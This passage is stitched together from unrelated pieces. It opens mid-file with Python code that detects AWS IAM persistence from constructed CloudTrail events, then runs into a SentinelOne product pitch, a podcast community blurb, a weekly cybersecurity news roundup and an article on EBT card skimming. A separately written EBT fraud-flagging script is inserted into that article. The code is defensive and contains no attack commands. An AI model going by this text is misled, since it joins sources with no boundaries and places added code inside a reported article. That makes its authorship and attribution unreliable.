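    {"eventTime": "2023-02-14T10:15:00Z", "eventName": "ConsoleLogin",
     "userIdentity": {"userName": "jdoe"}, "sourceIPAddress": "203.0.113.7",
     "requestParameters": {}},
    {"eventTime": "2023-02-14T10:17:00Z", "eventName": "CreateUser",
     "userIdentity": {"userName": "jdoe"}, "sourceIPAddress": "203.0.113.7",
     "requestParameters": {"userName": "svc-backup"}},
    {"eventTime": "2023-02-14T10:18:00Z", "eventName": "AttachUserPolicy",
     "userIdentity": {"userName": "jdoe"}, "sourceIPAddress": "203.0.113.7",
     "requestParameters": {"userName": "svc-backup",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2023-02-14T10:19:00Z", "eventName": "CreateAccessKey",
     "userIdentity": {"userName": "jdoe"}, "sourceIPAddress": "203.0.113.7",
     "requestParameters": {"userName": "svc-backup"}},
    # Benign control: another admin creates a user with a read-only policy.
    {"eventTime": "2023-02-14T11:00:00Z", "eventName": "CreateUser",
     "userIdentity": {"userName": "alice"}, "sourceIPAddress": "198.51.100.4",
     "requestParameters": {"userName": "reporting"}},
    {"eventTime": "2023-02-14T11:01:00Z", "eventName": "AttachUserPolicy",
     "userIdentity": {"userName": "alice"}, "sourceIPAddress": "198.51.100.4",
     "requestParameters": {"userName": "reporting",
                           "policyArn": "arn:aws:iam::aws:policy/ReadOnlyAccess"}},
]


def find_iam_persistence(events, window=IAM_SEQUENCE_WINDOW):
    """Detect CreateUser followed, within `window`, by an admin policy attachment
    for the new user; also note whether an access key was minted for it.
    Returns one finding per new user, in time order."""
    created = {}  # new user name -> finding dict
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        name = ev["eventName"]
        params = ev.get("requestParameters") or {}
        actor = ev["userIdentity"]["userName"]
        t = _ts(ev["eventTime"])
        if name == "CreateUser":
            created[params["userName"]] = {
                "actor": actor, "new_user": params["userName"], "time": t,
                "ip": ev["sourceIPAddress"], "admin_policy": False, "access_key": False,
            }
            continue
        rec = created.get(params.get("userName"))
        if rec is None or t - rec["time"] > window:
            continue
        if name == "AttachUserPolicy" and params.get("policyArn") in ADMIN_POLICY_ARNS:
            rec["admin_policy"] = True
        elif name == "CreateAccessKey":
            rec["access_key"] = True
    return [r for r in created.values() if r["admin_policy"]]


def build_storyline(endpoint_alerts, cloud_events):
    """Join each host credential-theft alert to IAM persistence findings whose actor
    matches the host user (assumption: endpoint user name == IAM user name) and
    whose CreateUser falls within CORRELATION_WINDOW after the alert."""
    findings = find_iam_persistence(cloud_events)
    stories = []
    for alert in endpoint_alerts:
        t_alert = _ts(alert["time"])
        for f in findings:
            lag = f["time"] - t_alert
            if f["actor"] == alert["user"] and timedelta(0) <= lag <= CORRELATION_WINDOW:
                stories.append({
                    "host": alert["host"], "user": alert["user"],
                    "technique": alert["technique"], "cloud_ip": f["ip"],
                    "new_user": f["new_user"], "access_key": f["access_key"],
                    "minutes_after_alert": int(lag.total_seconds() // 60),
                })
    return stories


if __name__ == "__main__":
    for story in build_storyline(ENDPOINT_ALERTS, CLOUD_EVENTS):
        print(story)
```

On the constructed data the read-only user created by alice is not reported, while jdoe's CreateUser, AdministratorAccess attachment and access-key creation are joined to the laptop alert 75 minutes earlier as one storyline. In a real deployment the user-name join is the weak point: federated identities show up in CloudTrail as assumed roles, so the join key should be whatever your identity provider emits in both the host and cloud logs.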

Learn About SentinelOne’s Singularity for Cloud

To maintain steps ahead of threat actors, organizations using cloud services must fully understand how the services are being implemented and maintained. Visibility within the cloud is critical to seeing how file sharing is being done, the type of data being stored and its security, and what applications are connected.

SentinelOne’s Singularity™ Cloud ensures organizations get the right security in place to continue operating in their cloud infrastructures safely. Contact us today or book a demo to see how we can help improve your cloud defenses and fuse autonomous threat hunting, endpoint detection and response (EDR) capability, and security together to defeat cloud-based threats without compromising agility or availability.


About Angelneers

Angelneers is a community of startup builders with a mission of helping a new generation of startups drive the next phase of enterprise transformation. Angelneers aims to propagate better decisions around product, engineering, and growth. Their podcast interviews founders, operators, and technologists who have founded or helped build game-changing companies in the enterprise space.

The Good, the Bad and the Ugly in Cybersecurity – Week 7

The Good

Vladislav Klyushin, the owner of Russian cybersecurity firm M-13, was this week convicted in a U.S. court on charges of wire fraud, securities fraud, and obtaining unauthorized access to computers. Klyushin, along with four co-conspirators who remain at large, is believed to have netted around $90 million through securities trades based on information stolen from U.S. computer networks.

According to the DoJ, Klyushin used hacking techniques similar to those offered by his cybersecurity company to repeatedly hack into U.S. computer networks and steal confidential earnings reports ahead of their release. He then used the information obtained to trade illegally in the shares of hundreds of publicly traded companies.

In a trial that lasted 10 days, the court in Boston heard how Klyushin and his co-conspirators stole login information of employees at two U.S.-based filing agents used by publicly-traded companies to file their quarterly and annual earning reports to the SEC. They used proxy networks outside of Russia to conceal the true origin of their activities and stole filings from hundreds of companies, including Tesla, Roku and Snap. Much of the stolen data was downloaded through a computer server located in downtown Boston. Klyushin used the stolen information to trade in brokerage accounts held in his own name and the names of others.

The charges of securities fraud and wire fraud alone each provide for a sentence of up to 20 years in prison. Klyushin, who was arrested in Switzerland in 2021 and subsequently extradited to the U.S., is due to be sentenced on May 4th.

The Bad

Threat actors have been leveraging the cloud services of Dropbox, Microsoft Azure, Microsoft 365 Mail, and Google Firebase in what appears to be espionage-related activity against telecommunications companies in the Middle East.

A new report from SentinelLabs reveals that a cluster of threat activity targeting telcos used malicious WhatsApp messages to infect employees with malware hosted on Dropbox. Backdoors leveraging Microsoft 365 Mail and Google Firebase instances as C2 servers were then deployed on victims’ machines.

The backdoors masquerade as utility software, such as a PDF editor or browser, and use filenames, application icons, and digital signatures of known software vendors. Their capabilities include reconnaissance, privilege escalation, staging of additional malware, and data exfiltration. PowerShell commands were used to exfiltrate browser data and reconnaissance information to Microsoft Azure instances.

WIP26: Use of Cloud infrastructure

The use of public Cloud infrastructure for malware hosting, data exfiltration, and C2 purposes aims at making malicious traffic look legitimate. This gives attackers the opportunity to conduct their activities unnoticed, the SentinelLabs’ researchers say.

The cluster of activity at present remains unattributed to any known group and is tracked by SentinelLabs under the moniker “WIP26”. However, the threat actor behind the activity appeared to have made some OPSEC (operational security) errors. The researchers noted that a JSON file on a Google Firebase C2 server was publicly accessible and provided further insights into the WIP26 activity.

The Ugly

CISA is this week warning of four critical bugs in Microsoft and Apple software that may be under active exploitation and giving federal agencies 21 days to ensure their devices are patched.

A patch for a WebKit zero-day tracked as CVE-2023-23529 was released by Apple on Monday. The Cupertino outfit says that the bug allows maliciously crafted web content to cause arbitrary code execution and that it is aware of a report that the vulnerability may have been exploited in the wild. The WebKit bug affects macOS, iOS and iPadOS systems.

Tuesday saw Microsoft patch three bugs thought to be actively exploited, two of which could allow attackers to gain remote code execution. CVE-2023-21823 affects the Windows Graphics Component and, if successfully exploited, could allow an attacker to gain SYSTEM privileges. CVE-2023-23376 affects the Windows Common Log File System Driver and is an elevation of privilege vulnerability that requires no user interaction. Microsoft says the attack is of low complexity to carry out.

A third Microsoft bug patched this week, CVE-2023-21715, is a Microsoft Office macro policy bypass. Macro policies are intended to block untrusted or malicious files, but an attacker could use the bug to socially engineer a victim into downloading and opening a specially crafted file that could lead to a local attack on the victim’s computer.

CISA says bugs such as these are frequent attack vectors for malicious cyber actors and has given federal agencies until March 7 to patch affected systems. Enterprises would be well-advised to act somewhat faster than that.

New Protections for Food Benefits Stolen by Skimmers

Millions of Americans receiving food assistance benefits just earned a new right that they can’t yet enforce: The right to be reimbursed if funds on their Electronic Benefit Transfer (EBT) cards are stolen by card skimming devices secretly installed at cash machines and grocery store checkout lanes.

On December 29, 2022, President Biden signed into law the Consolidated Appropriations Act of 2023, which — for the first time ever — includes provisions for the replacement of stolen EBT benefits. This is a big deal because in 2022, organized crime groups began massively targeting EBT accounts — often emptying affected accounts at ATMs immediately after the states disburse funds each month.

EBT cards can be used along with a personal identification number (PIN) to pay for goods at participating stores, and to withdraw cash from an ATM. However, EBT cards differ from debit cards issued to most Americans in two important ways. First, most states do not equip EBT cards with smart chip technology, which can make the cards more difficult and expensive for skimming thieves to clone.

More critically, EBT participants traditionally have had little hope of recovering food assistance funds when their cards were copied by card-skimming devices and used for fraud. That’s because while the EBT programs are operated individually by the states, those programs are funded by the U.S. Department of Agriculture (USDA), which until late last year was barred from reimbursing states for stolen EBT funds.

The protections passed in the 2023 Appropriations Act allow states to use federal funds to replace stolen EBT benefits, and they permit states to seek reimbursement for any skimmed EBT funds they may have replaced from their own coffers (dating back to Oct. 1, 2022).

But first, all 50 states must each submit a plan for how they are going to protect and replace food benefits stolen via card skimming. Guidance for the states in drafting those plans was issued by the USDA on Jan. 31 (PDF), and states that don’t get them done before Feb. 27, 2023 risk losing the ability to be reimbursed for EBT fraud losses.

Deborah Harris is a staff attorney at The Massachusetts Law Reform Institute (MLRI), a nonprofit legal assistance organization that has closely tracked the EBT skimming epidemic. In November 2022, the MLRI filed a class-action lawsuit against Massachusetts on behalf of thousands of low-income families who were collectively robbed of more than $1 million in food assistance benefits by card skimming devices secretly installed at cash machines and grocery store checkout lanes across the state.

Harris said she’s pleased that the USDA guidelines were issued so promptly, and that the guidance for states was not overly prescriptive. For example, some security experts have suggested that adding contactless capability to EBT cards could help participants avoid skimming devices altogether. But Harris said contactless cards do not require a PIN, which is the only thing that stops EBT cards from being drained at the ATM when a participant’s card is lost or stolen.

Then again, nothing in the guidance even mentions chip-based cards, or any other advice for improving the physical security of EBT cards. Rather, it suggests states should seek to develop the capability to perform basic fraud detection and alerting on suspicious transactions, such as when an EBT card that is normally used only in one geographic area suddenly is used to withdraw cash at an ATM halfway across the country.

“Besides having the states move fast to approve their plans, we’d also like to see a focused effort to move states from magstripe-only cards to chip, and also assisting states to develop the algorithms that will enable them to identify likely incidents of stolen benefits,” Harris said.

Harris said Massachusetts has begun using algorithms to look for these suspicious transaction patterns throughout its EBT network, and now has the ability to alert households and verify transactions. But she said most states do not have this capability.

“We have heard that other states aren’t currently able to do that,” Harris said. “But encouraging states to more affirmatively identify instances of likely theft and assisting with the claims and verification process is critical. Most households can’t do that on their own, and in Massachusetts it’s very hard for a person to get a copy of their transaction history. Some states can do that through third-party apps, but something so basic should not be on the burden of EBT households.”

Some states aren’t waiting for direction from the federal government to beef up EBT card security. Maryland, for example, identified more than 1,400 households hit by EBT skimming attacks last year — a tenfold increase over 2021.

Advocates for EBT beneficiaries in Maryland are backing Senate Bill 401 (PDF), which would require the use of chip technology and ongoing monitoring for suspicious activity (a hearing on SB401 is scheduled in the Maryland Senate Finance Committee for Thursday, Feb. 23, at 1 p.m.).

Michelle Salomon Madaio is a director at the Homeless Persons Representation Project, a legal assistance organization based in Silver Spring, Md. Madaio said the bill would require the state Department of Human Services to replace skimmed benefits, not only after the bill goes into effect but also retroactively from January 2020 to the present.

Madaio said the bill also would require the state to monitor for patterns of suspicious activity on EBT cards, and to develop a mechanism to contact potentially affected households.

“For most of the skimming victims we’ve worked with, the fraudulent transactions would be pretty easy to spot because they mostly happened in the middle of the night or out of state, or both,” Madaio said. “To make matters worse, a lot of families whose benefits were scammed then incurred late fees on many other things as a result.”
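The fraud patterns the article describes are simple enough to encode as rules: cash withdrawn far from where the card is normally used, activity in the middle of the night, and a burst of ATM withdrawals right after the monthly issuance. The following is an added example, not code from any state EBT program, the USDA guidance, or MLRI: it runs those rules over a constructed transaction history for one card and flags transactions that trip at least two of them. The home-state inference (most common state in prior history), the overnight hours, the ten-minute burst window, the 24-hour post-issuance window, and the two-reason threshold are all assumptions chosen for illustration.

```python
"""Rule-based flagging of likely skimmed-card activity on an EBT card.

Added example (not from any state program or vendor). All transaction data
and the issuance schedule below are constructed for illustration.
"""
from __future__ import annotations

from collections import Counter
from datetime import datetime, timedelta

# Constructed history for one card. Times are local; channel is POS (purchase)
# or ATM (cash withdrawal); amount is in dollars.
TRANSACTIONS = [
    {"card": "1111", "time": "2023-01-05T12:10", "state": "MA", "channel": "POS", "amount": 84.20},
    {"card": "1111", "time": "2023-01-12T17:45", "state": "MA", "channel": "POS", "amount": 61.05},
    {"card": "1111", "time": "2023-01-20T09:30", "state": "MA", "channel": "POS", "amount": 45.00},
    {"card": "1111", "time": "2023-01-28T14:05", "state": "MA", "channel": "ATM", "amount": 40.00},
    # Benefits issued Feb 1; three overnight, out-of-state withdrawals drain the card.
    {"card": "1111", "time": "2023-02-01T02:14", "state": "CA", "channel": "ATM", "amount": 400.00},
    {"card": "1111", "time": "2023-02-01T02:16", "state": "CA", "channel": "ATM", "amount": 400.00},
    {"card": "1111", "time": "2023-02-01T02:19", "state": "CA", "channel": "ATM", "amount": 150.00},
    {"card": "1111", "time": "2023-02-03T11:00", "state": "MA", "channel": "POS", "amount": 22.50},
]
# Constructed monthly issuance schedule, per card.
ISSUANCE_DATES = {"1111": ["2023-02-01"]}

# Assumed thresholds; tune against real data.
MIN_HISTORY = 3                      # prior transactions needed to infer a home state
OVERNIGHT_HOURS = range(0, 5)        # 00:00-04:59 local
BURST_WINDOW = timedelta(minutes=10)  # repeated ATM withdrawals closer than this
POST_ISSUANCE_WINDOW = timedelta(hours=24)
MIN_REASONS = 2                      # rules that must fire before a transaction is flagged


def home_state(history, min_history=MIN_HISTORY):
    """Most common state over prior transactions, or None if history is too thin.
    Caveat: in production derive this only from verified (non-disputed) history,
    or a run of fraudulent transactions will shift the 'home' state."""
    if len(history) < min_history:
        return None
    return Counter(t["state"] for t in history).most_common(1)[0][0]


def score_transactions(transactions, issuance_dates, min_reasons=MIN_REASONS):
    """Replay transactions in time order, applying each rule against the card's
    history up to that point. Returns flagged transactions with their reasons."""
    flagged = []
    history_by_card = {}
    for tx in sorted(transactions, key=lambda t: t["time"]):
        hist = history_by_card.setdefault(tx["card"], [])
        t = datetime.fromisoformat(tx["time"])
        reasons = []

        home = home_state(hist)
        if home and tx["state"] != home:
            reasons.append(f"out of home state {home}")
        if t.hour in OVERNIGHT_HOURS:
            reasons.append("overnight (00:00-04:59)")
        if tx["channel"] == "ATM":
            recent_atm = [h for h in hist if h["channel"] == "ATM"
                          and t - datetime.fromisoformat(h["time"]) <= BURST_WINDOW]
            if recent_atm:
                reasons.append("repeated ATM withdrawals within 10 min")
            for day in issuance_dates.get(tx["card"], []):
                since_issue = t - datetime.fromisoformat(day)
                if timedelta(0) <= since_issue <= POST_ISSUANCE_WINDOW:
                    reasons.append("ATM cash-out within 24h of benefit issuance")

        hist.append(tx)
        if len(reasons) >= min_reasons:
            flagged.append({"card": tx["card"], "time": tx["time"], "state": tx["state"],
                            "amount": tx["amount"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in score_transactions(TRANSACTIONS, ISSUANCE_DATES):
        print(hit["time"], hit["state"], hit["amount"], "; ".join(hit["reasons"]))
```

On the constructed history only the three California withdrawals are flagged (the first by three rules, the next two by all four), and the legitimate Massachusetts purchases, including the one after the theft, are not. This is the alert-then-verify capability the article says Massachusetts has and most states lack; the rules are deliberately cheap so a state could run them at authorization time rather than in a nightly batch, which matters when the card is emptied within minutes of issuance.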

It is not difficult to see why organized crime groups have pounced on EBT cards as easy money. In most traditional payment card transactions, there are usually several parties that have a financial interest in minimizing fraud and fraud losses, including the bank that issued the card, the card network (Visa, MasterCard, Discover, etc.), and the merchant.

But that infrastructure simply does not exist within state EBT programs, and it certainly isn’t a thing at the inter-state level. What that means is that the vast majority of EBT cards have zero fraud controls, which is exactly what continues to make them so appealing to thieves.

For now, the only fraud controls available to most EBT cardholders include being especially paranoid about where they use their cards, and frequently changing their PINs.

According to USDA guidance issued prior to the passage of the appropriations act, EBT cardholders should consider changing their card PIN at least once a month.

“By changing PINs frequently, at least monthly, and doing so before benefit issuance dates, households can minimize their risk of stolen benefits from a previously skimmed EBT card,” the USDA advised.